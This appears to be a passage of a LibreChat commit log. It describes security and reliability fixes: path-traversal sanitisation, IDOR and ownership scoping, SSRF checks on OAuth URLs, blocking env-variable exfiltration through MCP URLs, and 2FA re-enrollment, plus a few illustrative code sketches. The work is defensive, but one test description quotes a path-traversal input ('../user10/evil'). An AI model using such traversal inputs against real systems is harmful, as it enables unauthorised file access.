* fix: await trackUserMessage before PUBLISH for structural ordering

trackUserMessage was fire-and-forget — the HSET for userMessage could
theoretically race with the PUBLISH. Await it so the write commits
before the pub/sub fires, guaranteeing any cross-replica getJob() after
the pub/sub window always finds userMessage in Redis. No-op for
non-created events (early return before any async work).

* refactor: type CreatedEvent.message explicitly, fix JSDoc and import

Give CreatedEvent.message its full known shape instead of
Record<string, unknown>. Update sendEvent JSDoc to reflect the
discriminated union. Use barrel import in test file.

* refactor: type FinalEvent fields with explicit message and conversation shapes

Replace Record<string, unknown> on requestMessage, responseMessage,
conversation, and runMessages with FinalMessageFields and a typed
conversation shape. Captures the known field set used by all final
event constructors (abort handler in GenerationJobManager and normal
completion in request.js) while allowing extension via index signature
for fields contributed by the full TMessage/TConversation schemas.

* refactor: narrow trackUserMessage with discriminated union, disambiguate error fields

Use 'created' in event to narrow ServerSentEvent to CreatedEvent,
eliminating all Record<string, unknown> casts and manual field
assertions. Add JSDoc to the two distinct error fields on
FinalMessageFields and FinalEvent to prevent confusion.

* fix: update cross-replica test to expect created event from metadata

The cross-replica subscribe fallback now correctly emits a created
event reconstructed from persisted metadata when userMessage exists
in the Redis job hash. Replica B receives 4 events (created + 3
deltas) instead of 3.
2026-03-15 11:11:10 -04:00
Danny Avila
e079fc4900
📎 fix: Enforce File Count and Size Limits Across All Attachment Paths (#12239)
* 🐛 fix: Enforce fileLimit and totalSizeLimit in Attached Files panel

The Files side panel (PanelTable) was not checking fileLimit or
totalSizeLimit from fileConfig when attaching previously uploaded files,
allowing users to bypass per-endpoint file count and total size limits.

* 🔧 fix: Address review findings on file limit enforcement

- Fix totalSizeLimit double-counting size of already-attached files
- Clarify fileLimit error message: "File limit reached: N files (endpoint)"
- Replace Array.from(...).reduce with for...of loop to avoid intermediate allocation
- Extract inline `type TFile` into standalone `import type` per project conventions

* test: Add PanelTable handleFileClick file limit tests

Cover fileLimit guard, totalSizeLimit guard, passing case,
double-count prevention for re-attached files, and boundary case.

* 🔧 test: Harden PanelTable test mock setup

- Use explicit endpoint key matching mockConversation.endpoint
  instead of relying on default fallback behavior
- Add supportedMimeTypes to mock config for explicit MIME coverage
- Throw on missing filename cell in clickFilenameCell to prevent
  silent false-positive blocking assertions

* ♻️ refactor: Align file validation ordering and messaging across upload paths

- Reorder handleFileClick checks to match validateFiles:
  disabled → fileLimit → fileSizeLimit → checkType → totalSizeLimit
- Change fileSizeLimit comparison from > to >= in handleFileClick
  to match validateFiles behavior
- Align validateFiles error strings with localized key wording:
  "File limit reached:", "File size limit exceeded:", etc.
- Remove stray console.log in validateFiles MIME-type check

* test: Add validateFiles unit tests for both paths' consistency

13 tests covering disabled, empty, fileLimit (reject + boundary),
fileSizeLimit (>= at limit + under limit), checkType, totalSizeLimit
(reject + at limit), duplicate detection, and check ordering.
Ensures both validateFiles and handleFileClick enforce the same
validation rules in the same order.
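The shared check ordering and the double-count fix described above can be sketched as follows. All names (`FileConfig`, `validateAttach`, field names) are illustrative, not LibreChat's actual API; the `>=` size comparison and the re-attach de-duplication follow the commit messages.

```typescript
// Illustrative sketch of the unified validation order:
// disabled → fileLimit → fileSizeLimit → checkType → totalSizeLimit.
interface FileConfig {
  disabled?: boolean;
  fileLimit: number;
  fileSizeLimit: number; // bytes, per file
  totalSizeLimit: number; // bytes, across all attached files
  supportedMimeTypes: RegExp[];
}

interface AttachedFile {
  filename: string;
  size: number;
  type: string;
}

function validateAttach(
  config: FileConfig,
  attached: AttachedFile[],
  candidate: AttachedFile,
): string | null {
  if (config.disabled) {
    return 'Uploads are disabled for this endpoint';
  }
  if (attached.length + 1 > config.fileLimit) {
    return `File limit reached: ${config.fileLimit} files`;
  }
  // >= (not >) so handleFileClick matches validateFiles behavior
  if (candidate.size >= config.fileSizeLimit) {
    return 'File size limit exceeded';
  }
  if (!config.supportedMimeTypes.some((re) => re.test(candidate.type))) {
    return 'Unsupported file type';
  }
  // Sum with a for...of loop (no intermediate array), skipping a file
  // that matches the candidate so re-attaching does not double-count.
  let total = candidate.size;
  for (const f of attached) {
    if (f.filename !== candidate.filename) {
      total += f.size;
    }
  }
  if (total > config.totalSizeLimit) {
    return 'Total size limit exceeded';
  }
  return null;
}
```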
2026-03-15 10:39:42 -04:00
Danny Avila
93a628d7a2
📎 fix: Respect fileConfig.disabled for Agents Endpoint Upload Button (#12238)
* fix: respect fileConfig.disabled for agents endpoint upload button

The isAgents check was OR'd without the !isUploadDisabled guard,
bypassing the fileConfig.endpoints.agents.disabled setting and
always rendering the attach file menu for agents.

* test: add regression tests for fileConfig.disabled upload guard

Cover the isUploadDisabled rendering gate for agents and assistants
endpoints, preventing silent reintroduction of the bypass bug.

* test: cover disabled fallback chain in useAgentFileConfig

Verify agents-disabled propagates when no provider is set,
when provider has no specific config (agents as fallback),
and that provider-specific enabled overrides agents disabled.
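The shape of the bug (an endpoint check OR'd outside the disabled guard) can be sketched abstractly; the condition names are hypothetical, only the boolean structure follows the commit message.

```typescript
// Buggy: isAgents short-circuits past the !isUploadDisabled guard, so
// the attach menu always renders for agents even when uploads are off.
function shouldRenderAttachMenuBuggy(
  isAgents: boolean,
  isUploadDisabled: boolean,
  endpointSupportsFiles: boolean,
): boolean {
  return isAgents || (endpointSupportsFiles && !isUploadDisabled);
}

// Fixed: the disabled guard applies to every endpoint, agents included.
function shouldRenderAttachMenuFixed(
  isAgents: boolean,
  isUploadDisabled: boolean,
  endpointSupportsFiles: boolean,
): boolean {
  return (isAgents || endpointSupportsFiles) && !isUploadDisabled;
}
```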
2026-03-15 10:35:44 -04:00
Danny Avila
0c27ad2d55
🛡️ refactor: Scope Action Mutations by Parent Resource Ownership (#12237)
* 🛡️ fix: Scope action mutations by parent resource ownership

Prevent cross-tenant action overwrites by validating that an existing
action's agent_id/assistant_id matches the URL parameter before allowing
updates or deletes. Without this, a user with EDIT access on their own
agent could reference a foreign action_id to hijack another agent's
action record.

* 🛡️ fix: Harden action ownership checks and scope write filters

- Remove && short-circuit that bypassed the guard when agent_id or
  assistant_id was falsy (e.g. assistant-owned actions have no agent_id,
  so the check was skipped entirely on the agents route).
- Include agent_id / assistant_id in the updateAction and deleteAction
  query filters so the DB write itself enforces ownership atomically.
- Log a warning when deleteAction returns null (silent no-op from
  data-integrity mismatch).

* 📝 docs: Update Action model JSDoc to reflect scoped query params

* test: Add Action ownership scoping tests

Cover update, delete, and cross-type protection scenarios using
MongoMemoryServer to verify that scoped query filters (agent_id,
assistant_id) prevent cross-tenant overwrites and deletions at the
database level.

* 🛡️ fix: Scope updateAction filter in agent duplication handler

* 🐛 fix: Use action metadata domain instead of action_id when duplicating agent actions

The duplicate handler was splitting `action.action_id` by `actionDelimiter`
to extract the domain, but `action_id` is a bare nanoid that doesn't
contain the delimiter. This produced malformed entries in the duplicated
agent's actions array (nanoid_action_newNanoid instead of
domain_action_newNanoid). The domain is available on `action.metadata.domain`.

* test: Add integration tests for agent duplication action handling

Uses MongoMemoryServer with real Agent and Action models to verify:
- Duplicated actions use metadata.domain (not action_id) for the
  agent actions array entries
- Sensitive metadata fields are stripped from duplicated actions
- Original action documents are not modified
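The ownership-scoped write filter idea can be sketched as a small helper. The field names (`action_id`, `agent_id`, `assistant_id`, `user`) come from the commit messages; the helper itself is illustrative, not LibreChat's code.

```typescript
// Build a Mongo-style filter that scopes an action write by its parent
// resource, so the DB update/delete itself enforces ownership atomically.
type ActionFilter = {
  action_id: string;
  user: string;
  agent_id?: string;
  assistant_id?: string;
};

function buildActionFilter(params: {
  action_id: string;
  user: string;
  agent_id?: string;
  assistant_id?: string;
}): ActionFilter {
  const filter: ActionFilter = { action_id: params.action_id, user: params.user };
  // Include whichever parent id the route supplied: a foreign action_id
  // that belongs to another agent/assistant then matches no document,
  // instead of being overwritten or deleted.
  if (params.agent_id != null) {
    filter.agent_id = params.agent_id;
  }
  if (params.assistant_id != null) {
    filter.assistant_id = params.assistant_id;
  }
  return filter;
}
```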
2026-03-15 10:19:29 -04:00
Danny Avila
7c39a45944
🐍 refactor: Normalize Non-Standard Browser MIME Type Aliases in inferMimeType (#12240)
* 🐛 fix: Normalize non-standard browser MIME types in inferMimeType

macOS Chrome/Firefox report .py files as text/x-python-script instead
of text/x-python, causing client-side validation to reject Python file
uploads. inferMimeType now normalizes known MIME type aliases before
returning, so non-standard variants match the accepted regex patterns.

* 🧪 test: Add tests for MIME type alias normalization in inferMimeType

* 🐛 fix: Restore JSDoc params and make mimeTypeAliases immutable

* 🧪 test: Add checkType integration tests, remove redundant DragDropModal tests
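The alias normalization amounts to a frozen lookup table consulted before returning. A minimal sketch, with an example alias table rather than the full list LibreChat ships:

```typescript
// Known non-standard browser MIME aliases mapped to their canonical form.
// The table is illustrative; only the .py entry is confirmed by the commit.
const mimeTypeAliases: Readonly<Record<string, string>> = Object.freeze({
  'text/x-python-script': 'text/x-python', // macOS Chrome/Firefox for .py
});

// Normalize a reported MIME type so non-standard variants still match
// the accepted regex patterns used by client-side validation.
function normalizeMimeType(mime: string): string {
  return mimeTypeAliases[mime] ?? mime;
}
```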
2026-03-14 22:43:18 -04:00
Danny Avila
8318446704
💁 refactor: Better Config UX for MCP STDIO with customUserVars (#12226)
* refactor: Better UX for MCP stdio with Custom User Variables

- Updated the ConnectionsRepository to prevent connections when customUserVars are defined, improving security and access control.
- Modified the MCPServerInspector to skip capabilities fetch when customUserVars are present, streamlining server inspection.
- Added tests to validate connection restrictions with customUserVars, ensuring robust handling of various server configurations.

This change enhances the overall integrity of the connection management process by enforcing stricter rules around custom user variables.

* fix: guard against empty customUserVars and add JSDoc context

- Extract `hasCustomUserVars()` helper to guard against truthy `{}`
  (Zod's `.record().optional()` yields `{}` on empty input, not `undefined`)
- Add JSDoc to `isAllowedToConnectToServer` explaining why customUserVars
  servers are excluded from app-level connections

* test: improve customUserVars test coverage and fixture hygiene

- Add no-connection-provided test for MCPServerInspector (production path)
- Fix test descriptions to match actual fixture values
- Replace real package name with fictional @test/mcp-stdio-server
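The `{}`-is-truthy pitfall the guard addresses is worth spelling out; a minimal sketch of the helper, with the config type shape assumed:

```typescript
// Zod's .record(...).optional() yields {} for empty input, not undefined,
// and {} is truthy, so `if (config.customUserVars)` passes incorrectly.
// Guard on the key count instead.
function hasCustomUserVars(config: {
  customUserVars?: Record<string, unknown>;
}): boolean {
  return (
    config.customUserVars != null &&
    Object.keys(config.customUserVars).length > 0
  );
}
```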
2026-03-14 21:22:25 -04:00
Danny Avila
7bc793b18d
🌊 fix: Prevent Buffered Event Duplication on SSE Resume Connections (#12225)
* fix: skipBufferReplay for job resume connections

- Introduced a new option `skipBufferReplay` in the `subscribe` method of `GenerationJobManagerClass` to prevent duplication of events when resuming a connection.
- Updated the logic to conditionally skip replaying buffered events if a sync event has already been sent, enhancing the efficiency of event handling during reconnections.
- Added integration tests to verify the correct behavior of the new option, ensuring that no buffered events are replayed when `skipBufferReplay` is true, while still allowing for normal replay behavior when false.

* refactor: Update GenerationJobManager to handle sync events more efficiently

- Modified the `subscribe` method to utilize a new `skipBufferReplay` option, allowing for the prevention of duplicate events during resume connections.
- Enhanced the logic in the `chat/stream` route to conditionally skip replaying buffered events if a sync event has already been sent, improving event handling efficiency.
- Updated integration tests to verify the correct behavior of the new option, ensuring that no buffered events are replayed when `skipBufferReplay` is true, while maintaining normal replay behavior when false.

* test: Enhance GenerationJobManager integration tests for Redis mode

- Updated integration tests to conditionally run based on the USE_REDIS environment variable, allowing for better control over Redis-related tests.
- Refactored test descriptions to utilize a dynamic `describeRedis` function, improving clarity and organization of tests related to Redis functionality.
- Removed redundant checks for Redis availability within individual tests, streamlining the test logic and enhancing readability.

* fix: sync handler state for new messages on resume

The sync event's else branch (new response message) was missing
resetContentHandler() and syncStepMessage() calls, leaving stale
handler state that caused subsequent deltas to build on partial
content instead of the synced aggregatedContent.

* feat: atomic subscribeWithResume to close resume event gap

Replaces separate getResumeState() + subscribe() calls with a single
subscribeWithResume() that atomically drains earlyEventBuffer between
the resume snapshot and the subscribe. In in-memory mode, drained events
are returned as pendingEvents for the client to replay after sync.
In Redis mode, pendingEvents is empty since chunks are already persisted.

The route handler now uses the atomic method for resume connections and
extracted shared SSE write helpers to reduce duplication. The client
replays any pendingEvents through the existing step/content handlers
after applying aggregatedContent from the sync payload.

* fix: only capture gap events in subscribeWithResume, not pre-snapshot buffer

The previous implementation drained the entire earlyEventBuffer into
pendingEvents, but pre-snapshot events are already reflected in
aggregatedContent. Replaying them re-introduced the duplication bug
through a different vector.

Now records buffer length before getResumeState() and slices from that
index, so only events arriving during the async gap are returned as
pendingEvents.

Also:
- Handle pendingEvents when resumeState is null (replay directly)
- Hoist duplicate test helpers to shared scope
- Remove redundant writableEnded guard in onDone
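The gap-capture technique of the last commit (record the buffer length before the async snapshot, then slice from that index) can be sketched in isolation. All names here are illustrative simplifications of the described `subscribeWithResume`:

```typescript
// Only events that arrive during the async gap between the resume
// snapshot and the subscribe are returned for replay; pre-snapshot
// events are already reflected in the snapshot's aggregated content,
// and replaying them would reintroduce the duplication bug.
async function subscribeWithResume<E>(
  earlyEventBuffer: E[],
  getResumeState: () => Promise<unknown>,
): Promise<{ resumeState: unknown; pendingEvents: E[] }> {
  const preSnapshotLength = earlyEventBuffer.length;
  const resumeState = await getResumeState();
  const pendingEvents = earlyEventBuffer.slice(preSnapshotLength);
  return { resumeState, pendingEvents };
}
```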
2026-03-14 10:54:26 -04:00
Danny Avila
cbdc6f6060
📦 chore: Bump NPM Audit Packages (#12227)
* 🔧 chore: Update file-type dependency to version 21.3.2 in package-lock.json and package.json

- Upgraded the "file-type" package from version 18.7.0 to 21.3.2 to ensure compatibility with the latest features and security updates.
- Added new dependencies related to the updated "file-type" package, enhancing functionality and performance.

* 🔧 chore: Upgrade undici dependency to version 7.24.1 in package-lock.json and package.json

- Updated the "undici" package from version 7.18.2 to 7.24.1 across multiple package files to ensure compatibility with the latest features and security updates.

* 🔧 chore: Upgrade yauzl dependency to version 3.2.1 in package-lock.json

- Updated the "yauzl" package from version 3.2.0 to 3.2.1 to incorporate the latest features and security updates.

* 🔧 chore: Upgrade hono dependency to version 4.12.7 in package-lock.json

- Updated the "hono" package from version 4.12.5 to 4.12.7 to incorporate the latest features and security updates.
2026-03-14 03:36:03 -04:00
Danny Avila
f67bbb2bc5
🧹 fix: Sanitize Artifact Filenames in Code Execution Output (#12222)
* fix: sanitize artifact filenames to prevent path traversal in code output

* test: Mock sanitizeFilename function in process.spec.js to return the original filename

- Added a mock implementation for the `sanitizeFilename` function in the `process.spec.js` test file to return the original filename, ensuring that tests can run without altering the filename during the testing process.

* fix: use path.relative for traversal check, sanitize all filenames, add security logging

- Replace startsWith with path.relative pattern in saveLocalBuffer, consistent
  with deleteLocalFile and getLocalFileStream in the same file
- Hoist sanitizeFilename call before the image/non-image branch so both code
  paths store the sanitized name in MongoDB
- Log a warning when sanitizeFilename mutates a filename (potential traversal)
- Log a specific warning when saveLocalBuffer throws a traversal error, so
  security events are distinguishable from generic network errors in the catch

* test: improve traversal test coverage and remove mock reimplementation

- Remove partial sanitizeFilename reimplementation from process-traversal tests;
  use controlled mock returns to verify processCodeOutput wiring instead
- Add test for image branch sanitization
- Use mkdtempSync for test isolation in crud-traversal to avoid parallel worker
  collisions
- Add prefix-collision bypass test case (../user10/evil vs user1 directory)

* fix: use path.relative in isValidPath to prevent prefix-collision bypass

Pre-existing startsWith check without path separator had the same class
of prefix-collision vulnerability fixed in saveLocalBuffer.
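The `path.relative` containment pattern referenced throughout these commits looks roughly like this. The function name is illustrative; the technique is standard.

```typescript
import * as path from 'node:path';

// A plain startsWith('/uploads/user1') check wrongly accepts
// '/uploads/user10/evil' (prefix collision). path.relative does not:
// a target outside the base resolves to a path beginning with '..'.
function isContainedIn(baseDir: string, target: string): boolean {
  const rel = path.relative(path.resolve(baseDir), path.resolve(target));
  return rel !== '' && !rel.startsWith('..') && !path.isAbsolute(rel);
}
```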
2026-03-14 03:09:26 -04:00
Danny Avila
35a35dc2e9
📏 refactor: Add File Size Limits to Conversation Imports (#12221)
* fix: add file size limits to conversation import multer instance

* fix: address review findings for conversation import file size limits

* fix: use local jest.mock for data-schemas instead of global moduleNameMapper

The global @librechat/data-schemas mock in jest.config.js only provided
logger, breaking all tests that depend on createModels from the same
package. Replace with a virtual jest.mock scoped to the import spec file.

* fix: move import to top of file, pre-compute upload middleware, assert logger.warn in tests

* refactor: move resolveImportMaxFileSize to packages/api

New backend logic belongs in packages/api as TypeScript. Delete the
api/server/utils/import/limits.js wrapper and import directly from
@librechat/api in convos.js and importConversations.js. Resolver unit
tests move to packages/api; the api/ spec retains only multer behavior
tests.

* chore: rename importLimits to import

* fix: stale type reference and mock isolation in import tests

Update typeof import path from '../importLimits' to '../import' after
the rename. Clear mockLogger.warn in beforeEach to prevent cross-test
accumulation.

* fix: add resolveImportMaxFileSize to @librechat/api mock in convos.spec.js

* fix: resolve jest.mock hoisting issue in import tests

jest.mock factories are hoisted above const declarations, so the
mockLogger reference was undefined at factory evaluation time. Use a
direct import of the mocked logger module instead.

* fix: remove virtual flag from data-schemas mock for CI compatibility

virtual: true prevents the mock from intercepting the real module in
CI where @librechat/data-schemas is built, causing import.ts to use
the real logger while the test asserts against the mock.
2026-03-14 03:06:29 -04:00
Danny Avila
c6982dc180
🛡️ fix: Agent Permission Check on Image Upload Route (#12219)
* fix: add agent permission check to image upload route

* refactor: remove unused SystemRoles import and format test file for clarity

* fix: address review findings for image upload agent permission check

* refactor: move agent upload auth logic to TypeScript in packages/api

Extract pure authorization logic from agentPermCheck.js into
checkAgentUploadAuth() in packages/api/src/files/agentUploadAuth.ts.
The function returns a structured result ({ allowed, status, error })
instead of writing HTTP responses directly, eliminating the dual
responsibility and confusing sentinel return value. The JS wrapper
in /api is now a thin adapter that translates the result to HTTP.

* test: rewrite image upload permission tests as integration tests

Replace mock-heavy images-agent-perm.spec.js with integration tests
using MongoMemoryServer, real models, and real PermissionService.
Follows the established pattern in files.agents.test.js. Moves test
to sibling location (images.agents.test.js) matching backend convention.
Adds temp file cleanup assertions on 403/404 responses and covers
message_file exemption paths (boolean true, string "true", false).

* fix: widen AgentUploadAuthDeps types to accept ObjectId from Mongoose

The injected getAgent returns Mongoose documents where _id and author
are Types.ObjectId at runtime, not string. Widen the DI interface to
accept string | Types.ObjectId for _id, author, and resourceId so the
contract accurately reflects real callers.

* chore: move agent upload auth into files/agents/ subdirectory

* refactor: delete agentPermCheck.js wrapper, move verifyAgentUploadPermission to packages/api

The /api-only dependencies (getAgent, checkPermission) are now passed
as object-field params from the route call sites. Both images.js and
files.js import verifyAgentUploadPermission from @librechat/api and
inject the deps directly, eliminating the intermediate JS wrapper.

* style: fix import type ordering in agent upload auth

* fix: prevent token TTL race in MCPTokenStorage.storeTokens

When expires_in is provided, use it directly instead of round-tripping
through Date arithmetic. The previous code computed accessTokenExpiry
as a Date, then after an async encryptV2 call, recomputed expiresIn by
subtracting Date.now(). On loaded CI runners the elapsed time caused
Math.floor to truncate to 0, triggering the 1-year fallback and making
the token appear permanently valid — so refresh never fired.
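The TTL race in the last commit reduces to a Date round-trip problem; a sketch with illustrative names, contrasting the two paths:

```typescript
const ONE_YEAR_S = 365 * 24 * 3600;

// Buggy shape: convert expires_in to an absolute expiry, then after async
// work recompute the duration from Date.now(). Elapsed time on a loaded
// runner can floor a short TTL to 0, triggering the 1-year fallback.
function ttlAfterRoundTrip(
  expiresInS: number,
  tokenCreatedMs: number,
  nowMs: number,
): number {
  const expiryMs = tokenCreatedMs + expiresInS * 1000;
  const recomputed = Math.floor((expiryMs - nowMs) / 1000);
  return recomputed > 0 ? recomputed : ONE_YEAR_S;
}

// Fixed shape: when the provider supplies expires_in, use the duration
// directly and skip the round-trip entirely.
function ttlDirect(expiresInS: number): number {
  return expiresInS;
}
```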
2026-03-14 02:57:56 -04:00
Danny Avila
71a3b48504
🔑 fix: Require OTP Verification for 2FA Re-Enrollment and Backup Code Regeneration (#12223)
* fix: require OTP verification for 2FA re-enrollment and backup code regeneration

* fix: require OTP verification for account deletion when 2FA is enabled

* refactor: Improve code formatting and readability in TwoFactorController and UserController

- Reformatted code in TwoFactorController and UserController for better readability by aligning parameters and breaking long lines.
- Updated test cases in deleteUser.spec.js and TwoFactorController.spec.js to enhance clarity by formatting object parameters consistently.

* refactor: Consolidate OTP and backup code verification logic in TwoFactorController and UserController

- Introduced a new `verifyOTPOrBackupCode` function to streamline the verification process for TOTP tokens and backup codes across multiple controllers.
- Updated the `enable2FA`, `disable2FA`, and `deleteUserController` methods to utilize the new verification function, enhancing code reusability and readability.
- Adjusted related tests to reflect the changes in verification logic, ensuring consistent behavior across different scenarios.
- Improved error handling and response messages for verification failures, providing clearer feedback to users.

* chore: linting

* refactor: Update BackupCodesItem component to enhance OTP verification logic

- Consolidated OTP input handling by moving the 2FA verification UI logic to a more consistent location within the component.
- Improved the state management for OTP readiness, ensuring the regenerate button is only enabled when the OTP is ready.
- Cleaned up imports by removing redundant type imports, enhancing code clarity and maintainability.

* chore: lint

* fix: stage 2FA re-enrollment in pending fields to prevent disarmament window

enable2FA now writes to pendingTotpSecret/pendingBackupCodes instead of
overwriting the live fields. confirm2FA performs the atomic swap only after
the new TOTP code is verified. If the user abandons mid-flow, their
existing 2FA remains active and intact.
2026-03-14 01:51:31 -04:00
Danny Avila
189cdf581d
🔐 fix: Add User Filter to Message Deletion (#12220)
* fix: add user filter to message deletion to prevent IDOR

* refactor: streamline DELETE request syntax in messages-delete test

- Simplified the DELETE request syntax in the messages-delete.spec.js test file by combining multiple lines into a single line for improved readability. This change enhances the clarity of the test code without altering its functionality.

* fix: address review findings for message deletion IDOR fix

* fix: add user filter to message deletion in conversation tests

- Included a user filter in the message deletion test to ensure proper handling of user-specific deletions, enhancing the accuracy of the test case and preventing potential IDOR vulnerabilities.

* chore: lint
2026-03-13 23:42:37 -04:00
Danny Avila
ca79a03135
🚦 fix: Add Rate Limiting to Conversation Duplicate Endpoint (#12218)
* fix: add rate limiting to conversation duplicate endpoint

* chore: linter

* fix: address review findings for conversation duplicate rate limiting

* refactor: streamline test mocks for conversation routes

- Consolidated mock implementations into a dedicated `convos-route-mocks.js` file to enhance maintainability and readability of test files.
- Updated tests in `convos-duplicate-ratelimit.spec.js` and `convos.spec.js` to utilize the new mock structure, improving clarity and reducing redundancy.
- Enhanced the `duplicateConversation` function to accept an optional title parameter for better flexibility in conversation duplication.

* chore: rename files
2026-03-13 23:40:44 -04:00
Danny Avila
fa9e1b228a
🪪 fix: MCP API Responses and OAuth Validation (#12217)
* 🔒 fix: Validate MCP Configs in Server Responses

* 🔒 fix: Enhance OAuth URL Validation in MCPOAuthHandler

- Introduced validation for OAuth URLs to ensure they do not target private or internal addresses, enhancing security against SSRF attacks.
- Updated the OAuth flow to validate both authorization and token URLs before use, ensuring compliance with security standards.
- Refactored redirect URI handling to streamline the OAuth client registration process.
- Added comprehensive error handling for invalid URLs, improving robustness in OAuth interactions.

* 🔒 feat: Implement Permission Checks for MCP Server Management

- Added permission checkers for MCP server usage and creation, enhancing access control.
- Updated routes for reinitializing MCP servers and retrieving authentication values to include these permission checks, ensuring only authorized users can access these functionalities.
- Refactored existing permission logic to improve clarity and maintainability.

* 🔒 fix: Enhance MCP Server Response Validation and Redaction

- Updated MCP route tests to use `toMatchObject` for better validation of server response structures, ensuring consistency in expected properties.
- Refactored the `redactServerSecrets` function to streamline the removal of sensitive information, ensuring that user-sourced API keys are properly redacted while retaining their source.
- Improved OAuth security tests to validate rejection of private URLs across multiple endpoints, enhancing protection against SSRF vulnerabilities.
- Added comprehensive tests for the `redactServerSecrets` function to ensure proper handling of various server configurations, reinforcing security measures.

* chore: eslint

* 🔒 fix: Enhance OAuth Server URL Validation in MCPOAuthHandler

- Added validation for discovered authorization server URLs to ensure they meet security standards.
- Improved logging to provide clearer insights when an authorization server is found from resource metadata.
- Refactored the handling of authorization server URLs to enhance robustness against potential security vulnerabilities.

* 🔒 test: Bypass SSRF validation for MCP OAuth Flow tests

- Mocked SSRF validation functions to allow tests to use real local HTTP servers, facilitating more accurate testing of the MCP OAuth flow.
- Updated test setup to ensure compatibility with the new mocking strategy, enhancing the reliability of the tests.

* 🔒 fix: Add Validation for OAuth Metadata Endpoints in MCPOAuthHandler

- Implemented checks for the presence and validity of registration and token endpoints in the OAuth metadata, enhancing security by ensuring that these URLs are properly validated before use.
- Improved error handling and logging to provide better insights during the OAuth metadata processing, reinforcing the robustness of the OAuth flow.

* 🔒 refactor: Simplify MCP Auth Values Endpoint Logic

- Removed redundant permission checks for accessing the MCP server resource in the auth-values endpoint, streamlining the request handling process.
- Consolidated error handling and response structure for improved clarity and maintainability.
- Enhanced logging for better insights during the authentication value checks, reinforcing the robustness of the endpoint.

* 🔒 test: Refactor LeaderElection Integration Tests for Improved Cleanup

- Moved Redis key cleanup to the beforeEach hook to ensure a clean state before each test.
- Enhanced afterEach logic to handle instance resignations and Redis key deletion more robustly, improving test reliability and maintainability.
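The kind of SSRF guard these commits describe can be sketched as a hostname check before any OAuth endpoint is used. This is a simplified illustration only: it inspects literal hostnames and does not cover DNS-resolution tricks, which a production guard must also handle.

```typescript
// Reject loopback, link-local, and RFC 1918 private hostnames.
function isPrivateHostname(hostname: string): boolean {
  if (hostname === 'localhost' || hostname === '::1') {
    return true;
  }
  const m = hostname.match(/^(\d+)\.(\d+)\.(\d+)\.(\d+)$/);
  if (!m) {
    return false;
  }
  const a = Number(m[1]);
  const b = Number(m[2]);
  if (a === 127 || a === 10) return true; // loopback, 10/8
  if (a === 192 && b === 168) return true; // 192.168/16
  if (a === 172 && b >= 16 && b <= 31) return true; // 172.16/12
  if (a === 169 && b === 254) return true; // link-local
  return false;
}

// Validate an OAuth authorization/token URL before use.
function validateOAuthUrl(raw: string): void {
  const url = new URL(raw);
  if (url.protocol !== 'https:' && url.protocol !== 'http:') {
    throw new Error(`Unsupported protocol: ${url.protocol}`);
  }
  if (isPrivateHostname(url.hostname)) {
    throw new Error(`OAuth URL targets a private address: ${url.hostname}`);
  }
}
```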
2026-03-13 23:18:56 -04:00
Danny Avila
f32907cd36
🔏 fix: MCP Server URL Schema Validation (#12204)
* fix: MCP server configuration validation and schema

- Added tests to reject URLs containing environment variable references for SSE, streamable-http, and websocket types in the MCP routes.
- Introduced a new schema in the data provider to ensure user input URLs do not resolve environment variables, enhancing security against potential leaks.
- Updated existing MCP server user input schema to utilize the new validation logic, ensuring consistent handling of user-supplied URLs across the application.

* fix: MCP URL validation to reject env variable references

- Updated tests to ensure that URLs for SSE, streamable-http, and websocket types containing environment variable patterns are rejected, improving security against potential leaks.
- Refactored the MCP server user input schema to enforce stricter validation rules, preventing the resolution of environment variables in user-supplied URLs.
- Introduced new test cases for various URL types to validate the rejection logic, ensuring consistent handling across the application.

* test: Enhance MCPServerUserInputSchema tests for environment variable handling

- Introduced new test cases to validate the prevention of environment variable exfiltration through user input URLs in the MCPServerUserInputSchema.
- Updated existing tests to confirm that URLs containing environment variable patterns are correctly resolved or rejected, improving security against potential leaks.
- Refactored test structure to better organize environment variable handling scenarios, ensuring comprehensive coverage of edge cases.
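Rejecting env-variable references in user-supplied URLs reduces to a pattern test. A minimal sketch, assuming the `${VAR_NAME}` placeholder syntax LibreChat uses in its YAML config:

```typescript
// A user-supplied URL that still contains a ${VAR} placeholder could,
// if resolved server-side, exfiltrate the variable's value to the
// attacker-controlled host. Reject it outright.
const ENV_VAR_PATTERN = /\$\{[A-Za-z_][A-Za-z0-9_]*\}/;

function isSafeUserUrl(url: string): boolean {
  return !ENV_VAR_PATTERN.test(url);
}
```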
2026-03-12 23:19:31 -04:00
github-actions[bot]
65b0bfde1b
🌍 i18n: Update translation.json with latest translations (#12203)
Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
2026-03-12 20:48:05 -04:00
Danny Avila
3ddf62c8e5
🫙 fix: Force MeiliSearch Full Sync on Empty Index State (#12202)
* fix: meili index sync with unindexed documents

- Updated `performSync` function to force a full sync when a fresh MeiliSearch index is detected, even if the number of unindexed messages or convos is below the sync threshold.
- Added logging to indicate when a fresh index is detected and a full sync is initiated.
- Introduced new tests to validate the behavior of the sync logic under various conditions, ensuring proper handling of fresh indexes and threshold scenarios.

This change improves the reliability of the synchronization process, ensuring that all documents are indexed correctly when starting with a fresh index.

* refactor: update sync logic for unindexed documents in MeiliSearch

- Renamed variables in `performSync` to improve clarity, changing `freshIndex` to `noneIndexed` for better understanding of the sync condition.
- Adjusted the logic to ensure a full sync is forced when no messages or conversations are marked as indexed, even if below the sync threshold.
- Updated related tests to reflect the new logging messages and conditions, enhancing the accuracy of the sync threshold logic.

This change improves the readability and reliability of the synchronization process, ensuring all documents are indexed correctly when starting with a fresh index.

* fix: enhance MeiliSearch index creation error handling

- Updated the `mongoMeili` function to improve logging and error handling during index creation in MeiliSearch.
- Added handling for `MeiliSearchTimeOutError` to log a warning when index creation times out.
- Enhanced logging to differentiate between successful index creation and specific failure reasons, including cases where the index already exists.
- Improved debug logging for index creation tasks to provide clearer insights into the process.

This change enhances the robustness of the index creation process and improves observability for troubleshooting.

* fix: update MeiliSearch index creation error handling

- Modified the `mongoMeili` function to check for any status other than 'succeeded' during index creation, enhancing error detection.
- Improved logging to provide clearer insights when an index creation task fails, particularly for cases where the index already exists.

This change strengthens the error handling mechanism for index creation in MeiliSearch, ensuring better observability and reliability.
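The sync decision described in the first two commits reduces to one predicate; a sketch with illustrative names (`noneIndexed` follows the rename mentioned above):

```typescript
// Force a full sync when nothing is indexed yet (fresh index), even if
// the unindexed count is below the normal sync threshold.
function shouldFullSync(
  unindexed: number,
  indexed: number,
  threshold: number,
): boolean {
  const noneIndexed = indexed === 0 && unindexed > 0;
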